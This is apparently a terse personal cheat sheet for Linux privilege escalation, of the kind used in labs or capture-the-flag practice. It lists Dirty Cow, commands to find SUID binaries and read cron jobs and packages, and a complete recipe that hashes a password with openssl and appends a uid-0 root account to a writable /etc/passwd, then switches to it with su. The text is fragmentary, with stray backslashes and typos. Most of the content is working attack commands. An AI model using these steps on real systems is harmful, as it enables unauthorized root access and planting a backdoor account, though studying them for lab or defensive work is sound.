# Manual ### Linux Priv Esc • Dirty Cow • Rational Love check passwd file perm -- editing passwd file AI WEB ? Exploiting SUID Executables -rws find / -perm -u=s -type f 2>/dev/null willl show the executables having suid bit set find / -perm -4000 -type f 2>/dev/null find / -perm -4000 -type f 2>/dev/null looking for cronjobs cat /etc/cron.d if permissions denied look in cd /etc/cron.daily look for installed packages dpkg -l if passwd file writeable salt is limited to 2 chars\ password is limited to 8 chars\ \ openssl passwd rks\ ^password\ \ openssl passwd -salt 12 rks\ ^2char salt to be added\ openssl passwd -1 rishabhkumar\ ^for md5 algo -- this allows us to put more than 8 char of password\ \ in output $1$ represnts md5 algo\ \ \ openssl passwd -1 -salt yoo12 rks\@123\ -1 for md5\ -salt for salt\ at last password\ \ \ \ in linux the username is used to salt the password\ \ so your command is going to be like\ \ openssl passwd -1 -salt \ \\ openssl passwd -1 -salt rks rks\@123\ will get a hash -- add this hash in shadow file or passwd file\ echo ‘$1$rks$blahblahahs:0:0:root:/root:/bin/bash’ >>/etc/passwd\ \ su rks\ rks\@123 \[as password]\ \ boom root